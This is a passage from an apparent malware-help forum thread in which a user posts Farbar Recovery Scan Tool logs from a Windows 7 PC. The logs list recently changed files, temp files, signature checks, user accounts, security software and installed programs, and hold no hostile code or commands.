2017-12-11 13:40 - 2017-12-05 21:17 - 000171712 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000154208 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000149736 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000132072 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000046182 _____ C:\Windows\system32\nvinfo.pb
2017-12-11 13:40 - 2017-12-05 21:17 - 000045496 _____ (NVIDIA Corporation) C:\Windows\system32\nvhdap64.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000000669 _____ C:\Windows\SysWOW64\nv-vk32.json
2017-12-11 13:40 - 2017-12-05 21:17 - 000000669 _____ C:\Windows\system32\nv-vk64.json
2017-12-10 15:35 - 2017-12-10 15:35 - 000000000 ____D C:\Users\Sblck\AppData\Local\EotU
2017-12-10 00:33 - 2017-12-10 00:33 - 000000000 ____D C:\Users\Sblck\Documents\Duels of the Planeswalkers Dumps
2017-12-09 20:21 - 2017-12-09 20:21 - 000000000 ____D C:\Program Files (x86)\Origin Games
2017-12-09 18:01 - 2017-12-09 18:01 - 000000000 ____D C:\ProgramData\PopCap Games
2017-12-09 13:54 - 2017-12-09 13:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Plants vs. Zombies
2017-12-09 03:51 - 2017-12-09 03:51 - 000000000 ____D C:\Users\Sblck\Documents\My Spore Creations
2017-12-09 03:51 - 2017-12-09 03:51 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\Spore
2017-12-09 03:50 - 2017-12-09 03:50 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\Spore_Uninstall
2017-12-09 03:36 - 2017-12-09 03:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spore
2017-12-07 19:35 - 2017-12-07 19:35 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign7266a15b525aa838
2017-12-07 19:34 - 2017-12-07 19:34 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign0000f4ed20649afa
2017-12-06 17:57 - 2017-12-06 17:57 - 000000000 ____D C:\Users\Sblck\Documents\MATLAB
2017-12-06 17:57 - 2017-12-06 17:57 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\Subversion
2017-12-06 17:57 - 2017-12-06 17:57 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\MathWorks
2017-12-06 17:57 - 2017-12-06 17:57 - 000000000 ____D C:\Users\Sblck\AppData\Local\MathWorks
2017-12-05 19:19 - 2017-12-05 19:19 - 000000000 ____D C:\Users\Sblck\Documents\BlackSquad
2017-12-04 00:07 - 2017-12-04 00:07 - 000000000 ____D C:\Users\Sblck\Documents\MCEdit
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-12-28 20:43 - 2017-10-18 21:21 - 000084931 _____ C:\Windows\ZAM.krnl.trace
2017-12-28 20:43 - 2017-10-18 21:21 - 000056432 _____ C:\Windows\ZAM_Guard.krnl.trace
2017-12-28 15:58 - 2017-09-16 20:22 - 004765190 _____ C:\Windows\ntbtlog.txt
2017-12-28 15:39 - 2009-07-14 04:45 - 000026352 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-12-28 15:39 - 2009-07-14 04:45 - 000026352 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-12-28 15:34 - 2016-10-31 13:58 - 000192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-12-28 15:33 - 2016-09-27 16:20 - 000000000 ____D C:\Program Files (x86)\Steam
2017-12-28 15:32 - 2009-07-14 05:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2017-12-28 15:17 - 2009-07-14 03:20 - 000000000 ____D C:\Windows\Web
2017-12-28 11:00 - 2016-10-08 15:07 - 000000428 _____ C:\Windows\Tasks\ScpUpdater.job
2017-12-28 06:48 - 2016-10-31 20:24 - 000007594 _____ C:\Users\Sblck\AppData\Local\Resmon.ResmonCfg
2017-12-28 04:41 - 2009-07-14 03:20 - 000000000 ____D C:\Windows\inf
2017-12-28 04:09 - 2017-01-20 00:15 - 000000000 ____D C:\ProgramData\Sophos
2017-12-28 04:08 - 2016-09-27 16:01 - 000000000 ____D C:\Windows\pss
2017-12-28 02:42 - 2016-10-01 18:03 - 000000000 ____D C:\ProgramData\HitmanPro
2017-12-28 02:24 - 2017-09-22 00:32 - 000000000 ____D C:\AdwCleaner
2017-12-28 02:22 - 2016-09-29 14:49 - 000000000 ____D C:\Users\Sblck\AppData\Local\CrashDumps
2017-12-28 02:13 - 2009-07-14 03:20 - 000000000 ____D C:\Windows\Help
2017-12-28 01:45 - 2016-12-01 15:18 - 000000000 ____D C:\Users\Sblck\AppData\Local\Ubisoft Game Launcher
2017-12-27 14:58 - 2017-07-25 03:04 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\vlc
2017-12-26 22:33 - 2017-03-06 00:16 - 000000000 ____D C:\ProgramData\Origin
2017-12-26 21:31 - 2017-07-19 19:27 - 000000000 ____D C:\Program Files (x86)\RivaTuner Statistics Server
2017-12-26 17:54 - 2009-07-14 05:32 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2017-12-26 13:13 - 2016-09-30 13:56 - 000003408 _____ C:\Windows\System32\Tasks\GyazoUpdateTaskMachineDaily
2017-12-26 13:13 - 2016-09-30 13:56 - 000003282 _____ C:\Windows\System32\Tasks\GyazoUpdateTaskMachine
2017-12-26 13:13 - 2016-09-30 13:56 - 000000000 ____D C:\Program Files (x86)\Gyazo
2017-12-25 00:55 - 2016-09-28 20:25 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\Tunngle
2017-12-24 22:19 - 2016-09-28 20:25 - 000000000 ____D C:\ProgramData\Tunngle
2017-12-24 03:17 - 2017-04-22 02:51 - 000000000 ____D C:\Users\Sblck\AppData\LocalLow\Mozilla
2017-12-24 00:48 - 2017-04-23 00:37 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-12-22 15:07 - 2017-07-22 06:55 - 000003834 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1500706514
2017-12-22 15:07 - 2017-07-22 06:53 - 000000000 ____D C:\Program Files\Opera
2017-12-22 15:05 - 2009-07-14 05:13 - 000795934 _____ C:\Windows\system32\PerfStringBackup.INI
2017-12-21 15:28 - 2016-09-27 15:50 - 000000000 ____D C:\ProgramData\Package Cache
2017-12-21 13:01 - 2017-01-17 02:00 - 000000000 ____D C:\Users\Sblck\AppData\Local\Adobe
2017-12-21 13:01 - 2016-09-27 09:24 - 000000000 ____D C:\Users\Sblck
2017-12-21 03:18 - 2016-10-02 18:04 - 000004478 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2017-12-20 23:24 - 2016-09-27 18:57 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\discord
2017-12-20 23:13 - 2016-10-05 15:12 - 000000000 ____D C:\Users\Sblck\Documents\Adobe
2017-12-20 23:13 - 2016-09-27 09:24 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\Adobe
2017-12-20 23:10 - 2016-10-05 15:11 - 000000000 ____D C:\Program Files\Common Files\Adobe
2017-12-20 18:09 - 2016-09-28 16:45 - 000000000 ____D C:\Windows\Minidump
2017-12-20 18:07 - 2017-06-07 06:34 - 000000000 ____D C:\Program Files\Adobe
2017-12-20 17:52 - 2016-10-02 18:04 - 000000000 ____D C:\ProgramData\Adobe
2017-12-20 17:46 - 2016-10-02 18:04 - 000000000 ____D C:\Program Files (x86)\Adobe
2017-12-20 12:32 - 2009-07-14 05:08 - 000032608 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2017-12-20 01:31 - 2017-07-19 18:22 - 001065984 _____ C:\Users\Sblck\AppData\Local\file__0.localstorage
2017-12-20 00:08 - 2017-06-04 00:00 - 000000000 ____D C:\Users\Sblck\ansel
2017-12-19 03:42 - 2017-02-03 21:58 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\TeamViewer
2017-12-19 01:10 - 2017-03-06 00:19 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\Origin
2017-12-18 21:41 - 2016-10-02 20:10 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\qBittorrent
2017-12-16 20:38 - 2016-09-28 20:29 - 000000000 _____ C:\Windows\SysWOW64\Access.dat
2017-12-16 20:30 - 2016-10-13 14:54 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\SmartSteamEmu
2017-12-15 22:16 - 2009-07-14 03:20 - 000000000 ____D C:\Windows\system32\NDF
2017-12-11 22:45 - 2016-09-27 18:57 - 000000000 ____D C:\Users\Sblck\AppData\Local\Discord
2017-12-11 13:44 - 2017-09-25 01:29 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-12-11 13:43 - 2017-09-25 01:22 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2017-12-10 15:35 - 2016-12-28 03:46 - 000000000 ____D C:\Users\Sblck\AppData\Local\UnrealEngine
2017-12-10 02:42 - 2017-09-13 13:12 - 000000000 ____D C:\ProgramData\EA Logs
2017-12-10 02:32 - 2016-09-28 09:19 - 000000000 ____D C:\Users\Sblck\Documents\My Games
2017-12-09 20:28 - 2017-09-13 13:29 - 000348360 _____ C:\Windows\SysWOW64\PnkBstrB.xtr
2017-12-09 20:28 - 2017-09-13 13:01 - 000348360 _____ C:\Windows\SysWOW64\PnkBstrB.exe
2017-12-09 20:27 - 2017-09-13 13:01 - 000280904 _____ C:\Windows\SysWOW64\PnkBstrB.ex0
2017-12-08 21:58 - 2016-09-27 09:59 - 000002194 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-12-06 22:48 - 2016-10-04 20:57 - 000004514 _____ C:\Users\Sblck\AppData\Roaming\VoiceMeeterDefault.xml
2017-12-06 22:48 - 2016-10-04 20:46 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VB Audio
2017-12-06 22:48 - 2016-10-04 20:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VB Audio
2017-12-06 22:48 - 2016-10-01 23:30 - 000000000 ____D C:\Program Files\VB
2017-12-03 23:50 - 2016-11-21 19:26 - 000000000 ____D C:\Antonio PIXELMON SV
2017-12-03 16:34 - 2017-09-25 02:19 - 000000000 ____D C:\Users\Sblck\Documents\4A Games
2017-12-03 16:20 - 2017-09-25 02:15 - 000000000 ____D C:\Users\Sblck\AppData\Local\4A Games
2017-12-01 17:18 - 2016-09-27 20:44 - 000000000 ____D C:\Windows\SysWOW64\directx
2017-11-30 19:38 - 2017-09-25 17:08 - 000000000 ____D C:\Users\Sblck\AppData\Local\CyberGhost
2017-11-29 13:32 - 2016-10-02 18:04 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-11-28 19:42 - 2016-09-28 14:43 - 000000000 ____D C:\Users\Sblck\AppData\Local\ARK_Server_Manager
 
==================== Files in the root of some directories =======
 
2017-01-15 22:50 - 2017-01-15 22:50 - 000000001 _____ () C:\Users\Sblck\AppData\Roaming\EDCSSU
2016-10-04 20:57 - 2017-12-06 22:48 - 000004514 _____ () C:\Users\Sblck\AppData\Roaming\VoiceMeeterDefault.xml
2017-03-07 21:12 - 2017-11-26 13:57 - 000001456 _____ () C:\Users\Sblck\AppData\Local\Adobe Save for Web 13.0 Prefs
2017-12-28 02:22 - 2017-12-28 02:22 - 000002621 _____ () C:\Users\Sblck\AppData\Local\AppVShNotifyt.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000002584 _____ () C:\Users\Sblck\AppData\Local\AppVShNotifytvbs.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000002621 _____ () C:\Users\Sblck\AppData\Local\AppVShNotifytvbs.vbs
2017-07-19 18:22 - 2017-12-20 01:31 - 001065984 _____ () C:\Users\Sblck\AppData\Local\file__0.localstorage
2017-04-14 12:52 - 2017-04-14 12:52 - 000000093 _____ () C:\Users\Sblck\AppData\Local\fusioncache.dat
2017-12-28 02:08 - 2017-12-28 02:08 - 000000029 _____ () C:\Users\Sblck\AppData\Local\MCconfig.dll
2016-10-31 20:24 - 2017-12-28 06:48 - 000007594 _____ () C:\Users\Sblck\AppData\Local\Resmon.ResmonCfg
2008-02-05 13:28 - 2008-02-05 13:28 - 000000051 _____ () C:\Users\Sblck\AppData\Local\setup.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000938008 _____ () C:\Users\Sblck\AppData\Local\WindowsCodecsRaw.txt
2017-12-28 02:08 - 2017-12-28 02:22 - 000001757 _____ () C:\Users\Sblck\AppData\Local\x
2017-12-28 02:08 - 2017-12-28 02:08 - 000001684 _____ () C:\Users\Sblck\AppData\Local\XML.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000001760 _____ () C:\Users\Sblck\AppData\Local\xx
2017-12-28 02:08 - 2017-12-28 02:08 - 000001684 _____ () C:\Users\Sblck\AppData\Local\XXML.txt
 
Some files in TEMP:
====================
2017-12-20 20:29 - 2017-12-20 20:29 - 000000180 _____ () C:\Users\Sblck\AppData\Local\Temp\00e481b5e22dbe1f649fcddd505d3eb7.dll
2017-12-20 20:29 - 2017-12-27 21:55 - 000000016 _____ () C:\Users\Sblck\AppData\Local\Temp\17f3d3f36f1eb4b5d78cb5105d79e79b.dll
2017-08-31 14:57 - 2017-12-28 15:33 - 000192512 _____ () C:\Users\Sblck\AppData\Local\Temp\sfamcc00001.dll
2017-11-24 23:03 - 2017-12-20 20:50 - 000192512 _____ () C:\Users\Sblck\AppData\Local\Temp\sfamcc00002.dll
2017-12-28 15:21 - 2017-12-28 15:33 - 000158720 _____ () C:\Users\Sblck\AppData\Local\Temp\sfareca00001.dll
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2017-12-22 05:25
 
==================== End of FRST.txt ============================

Edited by xterz, 28 December 2017 - 03:58 PM.


#11 xterz

xterz
  • Topic Starter

  • Members
  • 18 posts
  • OFFLINE
  •  
  • Local time:03:06 AM

Posted 28 December 2017 - 04:00 PM

Following Addition : 
 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 26-12-2017
Ran by Sblck (28-12-2017 20:43:48)
Running from F:\Desktop\DesktopC
Windows 7 Ultimate Service Pack 1 (X64) (2016-09-27 09:23:29)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-2661263523-112610016-3866790350-500 - Administrator - Disabled)
Guest (S-1-5-21-2661263523-112610016-3866790350-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2661263523-112610016-3866790350-1006 - Limited - Enabled)
Sblck (S-1-5-21-2661263523-112610016-3866790350-1000 - Administrator - Enabled) => C:\Users\Sblck
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: ESET NOD32 Antivirus 10.0.390.0 (Enabled - Up to date) {EC1D6F37-E411-475A-DF50-12FF7FE4AC70}
AS: ESET NOD32 Antivirus 10.0.390.0 (Enabled - Up to date) {577C8ED3-C22B-48D4-E5E0-298D0463E6CD}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
7-Zip 17.00 beta (x64) (HKLM\...\7-Zip) (Version: 17.00 beta - Igor Pavlov)
Adobe Acrobat Reader DC - Português (HKLM-x32\...\{AC76BA86-7AD7-1046-7B44-AC0F074E4100}) (Version: 18.009.20050 - Adobe Systems Incorporated)
Adobe After Effects CC 2018 (HKLM-x32\...\AEFT_15_0_0) (Version: 15.0.0 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 4.3.0.256 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.148 - Adobe Systems Incorporated)
Adobe Flash Player 26 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 26.0.0.137 - Adobe Systems Incorporated)
Adobe Flash Player 26 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 26.0.0.137 - Adobe Systems Incorporated)
Adobe Media Encoder CC 2018 (HKLM-x32\...\AME_12_0_0) (Version: 12.0.0 - Adobe Systems Incorporated)
Adobe Photoshop CC 2017 (HKLM-x32\...\PHSP_18_1_1) (Version: 18.1.1 - Adobe Systems Incorporated)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.13 - Michael Tippach)
Audacity 2.1.2 (HKLM-x32\...\Audacity®_is1) (Version: 2.1.2 - Audacity Team)
AutoHotkey 1.1.26.00 (HKLM\...\AutoHotkey) (Version: 1.1.26.00 - Lexikos)
Battlefield 3™ (HKLM-x32\...\{76285C16-411A-488A-BCE3-C83CB933D8CF}) (Version: 1.6.0.0 - Electronic Arts)
Bethesda.net Launcher (HKLM-x32\...\{3448917E-E4FE-4E30-9502-9FD52EABB6F5}_is1) (Version: 1.26.4 - Bethesda Softworks)
Beyond Good and Evil (HKLM-x32\...\Uplay Install 232) (Version:  - Ubisoft)
BioShock 2 Remastered (HKLM-x32\...\BioShock 2 Remastered_is1) (Version:  - )
BioShock Remastered (HKLM-x32\...\BioShock Remastered_is1) (Version:  - )
BitRaider Streaming Client (HKLM-x32\...\BitRaider Streaming Client) (Version: 1.3.3.4098 - BitRaider, LLC)
BlueStacks 3 (HKLM-x32\...\BlueStacks) (Version: 3.7.44.1625 - BlueStack Systems, Inc.)
Cheat Engine 6.7 (HKLM-x32\...\Cheat Engine 6.7_is1) (Version:  - Cheat Engine)
Core Temp 1.3 (HKLM\...\{086D343F-8E78-4AFC-81AC-D6D414AFD8AC}_is1) (Version: 1.3 - ALCPU)
CPUID CPU-Z 1.77 (HKLM\...\CPUID CPU-Z_is1) (Version:  - )
Crazybump (remove only) (HKLM-x32\...\Crazybump) (Version:  - )
Creation Kit: Fallout 4 (HKLM-x32\...\Creation Kit: Fallout 4) (Version:  - Bethesda Softworks)
CyberGhost 6 (HKLM\...\CyberGhost 6_is1) (Version:  - CyberGhost S.A.)
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.4.0.0196 - Disc Soft Ltd)
Discord (HKU\S-1-5-21-2661263523-112610016-3866790350-1000\...\Discord) (Version: 0.0.299 - Discord Inc.)
EAX4 Unified Redist (HKLM-x32\...\{89661B04-C646-4412-B6D3-5E19F02F1F37}) (Version: 4.001 - Creative Labs)
Equalizer APO (HKLM\...\EqualizerAPO) (Version: 1.2 - )
ESET NOD32 Antivirus (HKLM\...\{FC6250CE-D271-4A2E-AFCC-59D2BFA29795}) (Version: 10.0.386.0 - ESET, spol. s r.o.)
Fallout 4 DDS Image Viewer (HKLM-x32\...\{200E4E99-8D0E-4575-A401-955C13BB5F0B}) (Version: 1.2 - Sir Garnon)
FL Studio 12 (HKLM-x32\...\FL Studio 12) (Version:  - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version:  - Image-Line)
Geeks3D FurMark 1.19.0.0 (HKLM-x32\...\{2397CAD4-2263-4CD0-96BE-E43A980B9C9A}_is1) (Version:  - Geeks3D)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 63.0.3239.84 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Guitar Pro 6 (HKLM-x32\...\{14A487F2-1259-4E6C-AE3C-3C888DDBCB60}_is1) (Version:  - Arobas Music)
Gyazo 3.3.5 (HKLM-x32\...\{6DB8C365-E719-4BA5-9594-10DFC244D3FD}_is1) (Version:  - Nota Inc.)
HD Tune Pro 5.70 (HKLM-x32\...\HD Tune Pro_is1) (Version:  - EFD Software)
Heaven Benchmark version 4.0 (HKLM-x32\...\Unigine Heaven Benchmark (Basic Edition)_is1) (Version: 4.0 - Unigine Corp.)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
HP Deskjet 3520 series Basic Device Software (HKLM\...\{A0A03B53-927D-4454-A456-CB0A72A4912F}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
HP Deskjet 3520 series Product Improvement Study (HKLM\...\{14ABDFC2-491B-4AF0-8134-CC5596D0EF57}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
HP Deskjet 3520 series Setup Guide (HKLM-x32\...\{AEEDCEB7-00B8-4BE1-B492-AB04803D5F1E}) (Version: 27.0.0 - Hewlett Packard)
HWiNFO64 Version 5.56 (HKLM\...\HWiNFO64_is1) (Version: 5.56 - Martin Malík - REALiX)
IL Download Manager (HKLM-x32\...\IL Download Manager) (Version:  - Image-Line)
Intel® C++ Redistributables on Intel® 64 (HKLM-x32\...\{F70BCE36-25F2-4475-A918-6209B3D85BF3}) (Version: 15.0.179 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.12.1498 - Intel Corporation)
Intel® Network Connections 17.3.63.0 (HKLM\...\PROSetDX) (Version: 17.3.63.0 - Intel)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.5.0.1026 - Intel Corporation)
Java 8 Update 144 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180144F0}) (Version: 8.0.1440.1 - Oracle Corporation)
Java 8 Update 144 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180144F0}) (Version: 8.0.1440.1 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
K-Lite Mega Codec Pack 13.2.4 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 13.2.4 - KLCP)
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version:  - )
League of Legends (HKLM-x32\...\{2A3DD76D-BB24-4C4B-BC36-FB25D8902946}) (Version: 4.1.2 - Riot Games) Hidden
League of Legends (HKLM-x32\...\League of Legends 4.1.2) (Version: 4.1.2 - Riot Games)
LOOT version 0.11.0 (HKLM-x32\...\{BF634210-A0D4-443F-A657-0DCE38040374}_is1) (Version: 0.11.0 - LOOT Team)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Mass Effect™ 2 (HKLM-x32\...\{75D84EF7-0D8C-4e70-B3FA-7B42A5D4E0EB}) (Version: 1.2.1604.0 - Electronic Arts)
MATLAB R2017a (HKLM\...\Matlab R2017a) (Version: 9.2 - MathWorks)
MegaDownloader 1.7 (HKLM\...\{C12C2297-65A4-4E64-9AE1-29F0D947FDA0}}_is1) (Version: 1.7 - AppsForMega.info)
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4.6.1 Hotfix Rollup (KB3154529) (HKLM\...\{5B71B4F6-A412-3C48-B332-0FA9B9958940}) (Version: 4.6.01081 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{59E4543A-D49D-4489-B445-473D763C79AF}) (Version: 2.0.672.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50907.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40649 (HKLM-x32\...\{5d0723d3-cff7-4e07-8d0b-ada737deb5e6}) (Version: 12.0.40649.5 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}) (Version: 1.20.146.0 - Microsoft)
MorphVOX Pro (HKLM-x32\...\{76828C87-C612-4329-843B-4DB58060030A}) (Version: 4.4.9 - Screaming Bee)
Mozilla Firefox 53.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 53.0 (x86 en-US)) (Version: 53.0 - Mozilla)
MSI Afterburner 4.4.0 (HKLM-x32\...\Afterburner) (Version: 4.4.0 - MSI Co., LTD)
